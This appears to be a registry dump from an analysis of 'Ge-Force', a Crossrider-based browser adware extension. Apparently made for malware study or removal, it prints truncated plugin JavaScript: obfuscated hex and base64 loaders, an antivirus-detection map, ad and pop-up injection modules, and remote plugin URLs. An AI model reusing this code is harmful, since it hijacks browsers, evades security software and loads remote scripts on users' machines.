    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b矝"

    [HKCU\Software\InstalledBrowserExtensions\iWebar]
    "69129" = "Ge-Force"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\Ge-Force\Plugins\286]
    "Version" = "2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\Ge-Force\Plugins\28]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/28.js"

    [HKCU\Software\Ge-Force\Plugins\354]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/354.js"

    [HKCU\Software\Ge-Force\Plugins\104]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/104.js"

    [HKCU\Software\Ge-Force\Plugins\192]
    "Version" = "10"

    [HKCU\Software\Ge-Force\Plugins\91]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/91.js"

    [HKCU\Software\Ge-Force\Plugins\345]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/345.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Ge-Force\Plugins\192]
    "Name" = "revizer_ws_dynamic_b2b_m"

    [HKCU\Software\Ge-Force\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seɾ"

    [HKCU\Software\Ge-Force\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\Ge-Force\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Ge-Force\Plugins\273]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/273.js"

    [HKCU\Software\Ge-Force\Plugins\22]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Plugins\21]
    "JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,@"

    [HKCU\Software\Ge-Force\Plugins\281]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\200]
    "Name" = "foxydeal_m"

    [HKCU\Software\Ge-Force\Plugins\345]
    "JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358],intext:[103,117,123,142,259,263,342,359,360],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351]};"

    [HKCU\Software\Ge-Force\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com**********************************************... = http://wt.iwebar.com;TOOLBAR_URL = HOST '/js/toolbar.js';AFFILIATE_ID = 'NONE';appAPI.ready(function($) { /* if (appAPI.db.get('user_id') === null) { if (appAPI.db.get('installation') === null){ appAPI.db.set('installation', new Date().getTime()); return; } else { if ((new Date().getTime() - appAPI.db.get('installation')) < 1000 * 60 * 60 * 48){ //No need to display toolbar... hasn't been 2 days yet. return; } } }*/ console.log(=======> Extension [version: appAPI.appInfo.version ] loading...); // Set the affiliate ID //appAPI.db.set('affiliate_id', AFFILIATE_ID); // Include the Base64 library appAPI."

    [HKCU\Software\Ge-Force\Manifest]
    "RunInFrame" = "false"

    [HKCU\Software\Ge-Force\Plugins\221]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

    [HKCU\Software\Ge-Force\Plugins\123]
    "Version" = "12"

    [HKCU\Software\Ge-Force\Plugins\192]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2NjcxNGMwNTBjMTIxOTJjMWUwNjRlNDI0ZTRmMTAxMjFkMDk1NjQ1NDMxOTFkMWYwZTRiMDg1NzBkMDEwZDE1MGYwNDEwMDI0NzE3MDkxZTQzMGIwYTQyNDk1MTU5NDk0MzViNWM0ODU2NDMxMjE1NGI1NTY2NjM0ZTEwMWExOTA4MTUzYzBiMDA0ODU2NTg0YzA1MGMxMjE5MGE1NjQ1NDMxOTFkMWYwZTRiMDg1NzBkMDEwZDE1MGYwNDEwMDI0NzE3MDkxZTQzMGIwYTQyNDk1MTU5NDk0MzViNWM0ODU2NDMxMjE1NGI1NTY2NjM0ZTA4MDIxODFmMGYwNzMwMDg0ODU2NTg1ZjU0NGE0YTYzNTk0YzRhNGM1YTE4MDgwYTEyMDAxYTBkMDY0ZTQyNGUzNjVhMDcwZDBhNGUzNzQwNzI0ZTRkNTg0NjRiMTAwMjA2MDUxNjBiMjcyYjQ0NTM1OTRlMWQwNTE2MGEwMjBmNDgzNjBiMWExMDVkNGY1ZTVkMDA1NzU5NDk1NDRhNTE1ODE1NGQ1ZjE2MWMxYjAwMDMxZjEwMGIxZjI3MTUxYzFiMDUwZTRiNDI0ZTRhMjczOTJhMmIyMzM5M2YyYTI3MjkzZDM0MzYzYzM0M2UyOTM2MmEyODNjMzkzYTJjMmUzNTI1M2MzMTMyNWY0YTQ5NWUwZDBlMDgxNzAwMDMxOTBiMGM1ZTU2NGE0YjI3MzEyZTJhMjkzYTJhM2UyMzI4M2QzYzMyMzkzNjM5MjYyMjJiMjEzZDMxMzI1ZjFiNTI1YjY2MTc=', 'jlxnmxfiyl'); }"

    [HKCU\Software\Ge-Force\Manifest]
    "BgVersion" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "CrPublisherId" = "21836"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "AppName" = "Ge-Force-bg.exe"

    [HKCU\Software\Ge-Force\Plugins\46]
    "Version" = "5"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "AppName" = "Ge-Force-codedownloader.exe"

    [HKCU\Software\Ge-Force]
    "ActiveAppId" = "69129"

    [HKCU\Software\Ge-Force\Plugins\183]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/183.js"

    [HKCU\Software\Crossrider]
    "Verifier" = "7d6635bb3acc762051a59407230a02ec"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "Policy" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "CrAppId" = "69129"
    "DisplayVersion" = "1.35.12.18"

    [HKCU\Software\Ge-Force\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,91"

    [HKCU\Software\Ge-Force\Plugins\72]
    "Name" = "appApiValidation"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Ge-Force\Plugins\35]
    "Name" = "IEAjax"

    [HKCU\Software\Ge-Force\Plugins\207]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/207.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Ge-Force\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI.e"

    [HKCU\Software\Ge-Force\Plugins\350]
    "Name" = "nguava_m"

    [HKCU\Software\Ge-Force\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars)"

    [HKCU\Software\Ge-Force\Debug]
    "IsDebuggingPlugins" = "0"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\288]
    "Name" = "firstoffer_pricecomp_m"

    [HKCU\Software\Ge-Force\Plugins\220]
    "JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var y={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64"

    [HKCU\Software\Ge-Force\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

    [HKCU\Software\Ge-Force\Plugins\35]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/35.js"

    [HKCU\Software\Ge-Force\Plugins\273]
    "Name" = "aedgency_back_button_m"

    [HKCU\Software\Ge-Force\Plugins\40]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

    [HKCU\Software\Ge-Force\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Ge-Force\Plugins\21]
    "Version" = "5"

    [HKLM\SOFTWARE\Ge-Force\Installer]
    "BundledIe" = "1"

    [HKCU\Software\Ge-Force\Plugins\354]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\193]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/193.js"

    [HKCU\Software\Ge-Force\Plugins\42]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/42.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Ge-Force\Plugins\47]
    "Name" = "resources_background"

    [HKCU\Software\Ge-Force\Plugins\39]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

    [HKCU\Software\Ge-Force\Plugins\193]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }"

    [HKCU\Software\Ge-Force\Plugins\1]
    "JavaScript" = "var __a0__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63\x64\x6e\x2e\x6e\x65\x74'].join('')var __a1__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69\x6e\x67\x2d\x61\x70','\x70\x2e\x63\x72\x6f\x73\x73\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a2__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f','\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63','\x64\x6e\x2e\x6e\x65\x74'].join('')var __a3__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69','\x6e\x67\x2d\x61\x70\x70\x2e\x63\x72\x6f\x73\x73','\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a4__ = ['\x68\x74\x74\x70\x3a\x2f','\x2f\x6e\x73\x74\x61\x74','\x73\x2e\x63\x72\x6f\x73','\x73\x72\x69\x64\x65\x72','\x2e\x63\x6f\x6d'].join('')var __a5__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74','\x61\x67\x69\x6e\x67\x2d\x61\x70\x70','\x2e\x63\x72\x6f\x73\x73\x72\x69\x64','\x65\x72\x2e\x63\x6f\x6d'].join('')var __a6__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f','\x75\x72\"

    [HKCU\Software\Ge-Force\Plugins\207]
    "Name" = "dbWrapper"

    [HKCU\Software\Ge-Force\Plugins\354]
    "JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""

    [HKCU\Software\Ge-Force\Plugins\44]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/44.js"

    [HKCU\Software\Ge-Force\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\Ge-Force\Plugins\182]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]"

    [HKCU\Software\Ge-Force\Installer]
    "zdata" = "0"

    [HKCU\Software\Ge-Force\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\Ge-Force\Installer]
    "Params" = "{ source_id : 001729, sub_id : 0, uzid : 0"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "Policy" = "3"

    [HKCU\Software\Ge-Force\Plugins\184]
    "Name" = "noproblemppc_m"

    [HKCU\Software\Ge-Force\Manifest]
    "Version" = "9"

    [HKCU\Software\Ge-Force\Plugins\44]
    "Name" = "IEMisc"

    [HKCU\Software\Ge-Force\Plugins\286]
    "Name" = "sp_j_m"

    [HKCU\Software\Ge-Force\Plugins\36]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/36.js"

    [HKCU\Software\Ge-Force\Plugins\246]
    "Version" = "15"

    [HKCU\Software\Ge-Force\Plugins\3]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/3.js"

    [HKCU\Software\Ge-Force\Plugins\345]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\91]
    "Version" = "111"

    [HKCU\Software\Ge-Force\Plugins\47]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/47.js"

    [HKCU\Software\Ge-Force\Plugins\301]
    "Name" = "guava_m"

    [HKCU\Software\Ge-Force\Plugins\45]
    "Name" = "IEOnRequest"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
    "Ge-Force-bg.exe" = "8000"

    [HKCU\Software\Ge-Force\Plugins\28]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\356]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/356.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKCU\Software\Ge-Force\Plugins\281]
    "Name" = "ibario_tier3_pops_m"

    [HKCU\Software\Ge-Force\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\Ge-Force\Plugins\281]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/281.js"

    [HKCU\Software\Ge-Force\Plugins\207]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac"

    [HKCU\Software\Ge-Force\Plugins\193]
    "Version" = "9"

    [HKCU\Software\Ge-Force\Plugins\195]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/195.js"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "Policy" = "1"

    [HKCU\Software\Ge-Force\Plugins\207]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\13]
    "Version" = "7"

    [HKCU\Software\Ge-Force\Manifest]
    "PluginsManifestVersion" = "5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Ge-Force\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"

    [HKCU\Software\Ge-Force\Plugins\41]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/41.js"

    [HKCU\Software\Ge-Force\Plugins\337]
    "Version" = "1"

    [HKCU\Software\Ge-Force\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "AppName" = "Ge-Force-buttonutil.exe"

    [HKCU\Software\Ge-Force\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\Ge-Force\Installer]
    "FullVersion" = "1.35.12.18"

    [HKCU\Software\Ge-Force\Plugins\93]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/93.js"

    [HKCU\Software\Crossrider]
    "Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"

    [HKCU\Software\Ge-Force\Plugins\220]
    "Version" = "38"

    [HKCU\Software\Ge-Force\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "Policy" = "3"

    [HKCU\Software\Ge-Force\Plugins\72]
    "JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p"

    [HKCU\Software\Ge-Force\Plugins\3]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\35]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "AppName" = "Ge-Force-buttonutil.exe"

